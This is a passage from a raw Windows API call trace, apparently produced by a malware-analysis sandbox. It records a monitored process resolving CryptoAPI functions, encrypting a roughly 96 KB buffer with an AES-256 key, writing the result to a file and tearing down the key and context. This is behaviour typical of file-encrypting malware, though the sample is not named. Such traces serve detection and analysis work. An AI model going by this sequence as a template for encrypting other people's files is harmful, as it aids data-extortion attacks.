hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.623] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.623] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e25d0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e25d0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0117.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.625] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.625] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.625] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0117.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.627] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.627] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.628] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.628] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0117.628] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0117.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.628] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.628] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.628] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.629] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x17844, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x17850) returned 1 [0117.629] CharLowerBuffW (in: lpsz="byte[96337]", cchLength=0xb | out: lpsz="byte[96337]") returned 0xb [0117.631] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.631] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1858*, pdwDataLen=0x144e538*=0x17844, dwBufLen=0x17850 | out: pbData=0x49b1858*, pdwDataLen=0x144e538*=0x17850) returned 1 [0117.631] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.631] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.631] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.632] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x17850, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x17850, lpOverlapped=0x0) returned 1 [0117.635] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca718, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.635] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0117.635] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.636] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.636] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.636] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0117.688] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0117.688] TranslateMessage (lpMsg=0x144ee2c) returned 0 [0117.688] DispatchMessageW (lpMsg=0x144ee2c) returned 0x0 [0117.688] KillTimer (hWnd=0x502d2, 